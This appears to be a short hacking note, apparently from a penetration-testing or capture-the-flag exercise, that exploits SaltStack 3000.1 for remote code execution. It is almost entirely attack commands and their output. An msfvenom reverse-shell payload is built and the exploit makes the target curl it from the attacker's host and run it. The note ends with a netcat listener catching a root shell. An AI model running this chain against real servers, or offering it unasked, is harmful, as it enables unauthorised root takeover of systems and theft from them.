zmtp 4505,4506

SaltStack 3000.1 - RCE

https://www.exploit-db.com/exploits/48421

msfvenom -p linux/x86/shell_reverse_tcp LHOST=ip LPORT=4506 -f elf > shell.elf
python3 exploit.py --master ip --exec "curl ip:4505/shell.elf -o /tmp/shell"
python3 exploit.py --master ip --exec "chmod +x /tmp/shell"
python3 exploit.py --master ip --exec "/tmp/shell"
$ sudo nc -nvlp 4506
listening on [any] 4506 ...
connect to [ip] from (UNKNOWN) [ip] 34288
id
uid=0(root) gid=0(root) groups=0(root)